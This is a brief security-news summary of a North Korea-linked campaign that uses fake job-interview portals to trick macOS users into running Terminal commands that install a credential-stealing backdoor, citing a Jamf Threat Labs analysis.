DPRK's FlexibleFerret Expands macOS Credential Theft Campaign

DPRK’s FlexibleFerret Tightens macOS Grip

The DPRK-linked threat actor behind the “Contagious Interview” campaign has updated its malware to exploit macOS users via fake job portals, with a 2025 report revealing a Go-based backdoor capable of stealing credentials and system data.

Why This Matters

macOS’s built-in protections like Gatekeeper are designed to block untrusted executables, but FlexibleFerret bypasses them by coercing users into manually running malicious Terminal commands. Jamf Threat Labs notes this campaign highlights a growing trend: attackers leveraging social engineering to circumvent technical safeguards, with stolen credentials potentially leading to large-scale data breaches.

Key Insights

• “Updated shell-loader with architecture-aware logic, 2025” (Jamf Threat Labs report)
• “Social engineering via fake job portals to bypass Gatekeeper protections” (Contagious Interview campaign)
• “MediaPatcher.app decoy used by DPRK-linked actors” (Jamf analysis)

Practical Applications

• Use Case: Fake job portals mimicking legitimate hiring assessments to trick users into executing malware
• Pitfall: Users running unverified Terminal commands from phishing sites, leading to credential theft and persistent backdoor access

References:

• https://www.darkreading.com/cyberattacks-data-breaches/dprks-flexibleferret-tightens-macos-grip